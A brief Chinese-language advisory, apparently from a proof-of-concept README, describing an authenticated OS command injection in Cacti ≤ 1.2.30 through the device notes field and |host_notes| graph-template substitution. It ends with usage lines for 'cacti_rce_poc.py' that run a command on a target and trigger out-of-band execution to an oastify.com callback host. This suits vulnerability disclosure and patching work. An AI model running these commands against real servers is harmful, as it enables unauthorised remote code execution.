
Cacti ≤ 1.2.30 中存在一个操作系统命令注入漏洞,允许任何拥有设备和图形模板创建权限的认证用户在底层服务器上执行任意命令。该漏洞的存在是因为用户可控的主机元数据字段(具体是设备备注字段)通过 Cacti 的变量替换引擎被直接插入到 RRDtool 命令行参数中,而没有任何清洗或转义。攻击者可以在备注字段中注入 shell 元字符,构造一个引用 |host_notes| 变量的图形模板,并触发图形渲染,从而以 Web 服务器用户的身份实现完全远程代码执行。
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'
OOB 命令执行:
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
